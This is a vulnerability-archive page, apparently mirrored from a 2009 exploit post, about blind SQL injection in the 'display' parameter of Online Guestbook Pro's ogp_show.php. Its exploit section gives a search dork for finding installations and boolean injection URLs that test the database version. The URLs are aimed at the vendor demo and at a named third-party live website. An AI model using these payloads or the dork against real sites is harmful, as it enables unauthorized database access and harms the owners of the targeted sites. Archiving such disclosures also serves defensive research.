Online Guestbook Pro (display) Blind SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052017 漏洞类型
发布时间 2009-04-17 更新时间 2009-04-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009040054
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Online Guestbook Pro (display) Blind SQL Injection Vulnerability


{____________________________________}
 Author: Hussin X

 Home :  WwW.IQ-TY.CoM

 email:  darkangel_g85[at]Yahoo[DoT]com
{____________________________________}



script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php

DorK   : Powered by Online Guestbook Pro




Demo :

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and
substring(@@version,1,1)=5

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and
substring(@@version,1,1)=4

BuT Results = Forbidden :D


demo to any web

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and
substring(@@version,1,1)=5

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and
substring(@@version,1,1)=4





Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke |
Cyber-Zone | kadmiwe | ahmed hassan | Sakab }

end.